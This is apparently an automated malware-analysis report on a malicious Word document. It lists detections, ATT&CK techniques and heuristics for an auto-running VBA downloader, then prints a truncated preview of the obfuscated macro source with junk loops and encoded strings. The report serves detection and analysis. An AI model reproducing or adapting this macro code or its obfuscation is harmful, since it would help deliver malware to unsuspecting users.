MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and uses CreateObject to execute code. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' and the presence of a VBA macro named 'macros.bas' strongly indicate that this file is a downloader for a second-stage payload. The obfuscated script functions like 'kzIIu' suggest attempts to hide the download URL or execution mechanism.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41004 bytes |
SHA-256: d89a44f83bf87fffc21ec1136071e4aed841e37241d158dc34577767d85939f4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 16 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "cRDqVGKv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ZjoOvursHAOjf"
Function cjQJFbvwvVuHEr()
On Error Resume Next
For Each CPCiw In slVmDE
Gudzj = 32808 - jNlrJ
For Each KMWAB In SCTiR
ijvdAo = FtLwri
Next
Next
nFdXHdj = kzIIu("IiEAOAA3AGMAMQA0ADEAMwA5AGIAZQA2AGQAOAA3ADQAMwA3ADcAYwBlADEATbJWjaX", 3, 58)
For Each joUod In ZvkjP
kimWm = 23487 - IChJD
For Each wQEKz In iVnqd
fEFQjz = NfDwS
Next
Next
For Each vwUSvN In lLbFL
aUjTP = 79806 - ijLBG
For Each qdmIA In MsdiY
nNpCP = rzfLh
Next
Next
tDiTJ = kzIIu("iKI.QBiAGQANwBkAQWoT", 5, 12)
For Each jtisBM In SMfWZw
avwLz = 72603 - RcbWj
For Each DKIkf In BbHbUq
zFpIq = DNhvz
Next
Next
For Each zHXHpF In UVUIno
jtGZs = 97114 - cnGDsk
For Each KkXka In wZkNzr
vXQBFE = qiPpk
Next
Next
KzhihczwzqG = kzIIu("K2ADIAZQA4ADMAZAA4AGUAYgAxAGQANQBkAGQAMABjAGIAMQA0ADgAMgAyADgAMwA2AGIANfQw1Q", 2, 70)
For Each wXTQD In VNJlzY
wVJJt = 53107 - OnFXF
For Each oaibUh In YtaFU
AWWll = dsFoj
Next
Next
For Each jAzzwB In AisZR
jJqcL = 32160 - CRVOYD
For Each zBiJh In HCFvK
qJArOE = GQwMs
Next
Next
HUifUk = kzIIu("4m.B%W4AGIAOQBlADMAOAA3ADEAMAA3ANhQ", 7, 26)
For Each iDdSf In ZvvawD
rMEdDu = 35129 - aSBZG
For Each Kwpwp In jDCdja
kDujC = fMBCmu
Next
Next
For Each DbBLD In bFQvYR
KnrSP = 52103 - ZjEGP
For Each kjIOA In wCppfh
hZWqC = omskt
Next
Next
jTLVQJHDEL = kzIIu("aAGYANgBlADcANgBmAGUAZQAyADEAMwAxAGYAOQA4ADMAYgAyAGUAZgAxADYAOAAwAGUAMQA3ADMAYwAyADQAMwA0ADUANQBlAGIAOQA4ADcAOQAyADUANAA3AGMAZgAxAwKa7r", 2, 129)
For Each PMdzUX In vCGszC
nTPVzL = 69993 - tpCsB
For Each bOrzO In kYUCV
klzbh = oGRUW
Next
Next
For Each RHGil In BFTmrz
lhwFaP = 84949 - BlVWh
For Each NSHnE In uECRY
YnuMh = abcPzb
Next
Next
OIKnStzmf = kzIIu("@IK.BhAGMAOAA5ADYAMQA4ADgAZABjADEANAA2ADgANQA3ADkANgBlAGIAOABmADMAOAA1GUDz", 5, 66)
For Each skDPWk In DdnnL
mjmjfi = 63057 - qEKpD
For Each wFbwUj In Miqoj
MRvAHA = ttpvjT
Next
Next
For Each MUcbHX In djLCEZ
dRjkm = 44035 - YbsEwu
For Each AGCQFj In QUaFJv
kiwLXt = SinjiI
Next
Next
voRtjZbj = kzIIu("maAiAMAAyAGlNP", 5, 7)
For Each skWJdz In ZImwpa
zJfdb = 77325 - stsbAc
For Each cPjaap In kDvjv
KaMMh = lVVID
Next
Next
For Each VsHzPk In sbAtD
iYzIQp = 72002 - YJslWw
For Each lKlfpi In OQzIz
FNtmhA = zCAib
Next
Next
dYjwY = kzIIu("bGIAMABkADIAZAAwAGMAMQBkAGMAZQA3ADEAMQBhADUU8YPdAY", 2, 42)
For Each GziPOt In mGQONN
fJjII = 84770 - ULQFD
For Each tmjKG In HcFfB
PJzzwi = TsWpT
Next
Next
For Each QqwCT In tYPQW
ZlizG = 38964 - awfNAu
For Each wWBwbi In quvWa
XWwRND = zQboRT
Next
Next
SlZlitzAJ = kzIIu("vUlYIANwAxADUAZQA3ADQAMAA5ADIANAAzADEAOQA3ADUAZgAxAGYAOABlADgAMgBjADYAYwA0ADQAMQA2ADEAMA2i", 5, 84)
For Each OJlcwH In JXWRon
iqjcjm = 52232 - wOzwO
For Each juNjHC In hJSZS
OzbAZ = oOZsM
Next
Next
For Each mfucdo In bjDzj
VSOaq = 46940 - Epjdk
For Each GYPwJ In nqSizw
jvQalL = SwiGA
Next
Next
qSiaq = kzIIu("i43YAYwBlADcAYgA2ADQANwBkADcAZABmC7X55", 5, 29)
For Each Qjjww In rYihL
uWsLCk = 33518 - JpdnPv
For Each NmHqI In qLGGWj
HIBNFq = piHvzp
Next
Next
For Each DrdNu In XQwqdz
OTYzRw = 63947 - JhPNXQ
For Each REJHXd In MiZsf
ibFdQD = wzdRv
Next
Next
ivGBZE = kzIIu("WUDwA3AHYAUgBjAFoAagBZA
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.